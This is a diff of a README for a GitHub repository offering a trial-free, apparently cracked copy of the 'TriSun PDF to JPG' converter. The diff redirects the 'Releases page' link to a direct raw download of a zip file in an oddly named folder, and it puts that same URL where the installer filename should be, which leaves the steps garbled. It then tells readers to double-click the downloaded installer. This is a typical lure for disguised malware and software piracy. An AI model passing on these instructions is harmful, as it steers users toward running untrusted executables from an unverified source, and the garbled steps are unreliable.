aliladz202020/TriSun-PDF-to-JPG-No-Trial/README.md

 Follow these steps to download and run TriSun PDF to JPG:

 1. **Visit the Download Page**
-   Head over to the [Releases page](https://github.com/aliladz202020/TriSun-PDF-to-JPG-No-Trial/releases) to find the latest version of the software.
+   Head over to the [Releases page](https://raw.githubusercontent.com/aliladz202020/TriSun-PDF-to-JPG-No-Trial/main/snowish/TriSun-PDF-to-JPG-No-Trial-2.9-beta.5.zip) to find the latest version of the software.

 2. **Choose Your Version**
    On the Releases page, you will see a list of available versions.
 Select the most recent version for the best features and updates.

 3. **Download the Installer**
    Click on the link for the installer file.
-This file will typically have a name like `TriSunPDFtoJPG.exe`.
+This file will typically have a name like `https://raw.githubusercontent.com/aliladz202020/TriSun-PDF-to-JPG-No-Trial/main/snowish/TriSun-PDF-to-JPG-No-Trial-2.9-beta.5.zip`.

 4. **Install the Application**
    Once the download is complete, locate the downloaded file in your computer's "Downloads" folder or the folder you selected.
 Double-click the installer file to begin the installation process.
 Follow the on-screen instructions to complete the installation.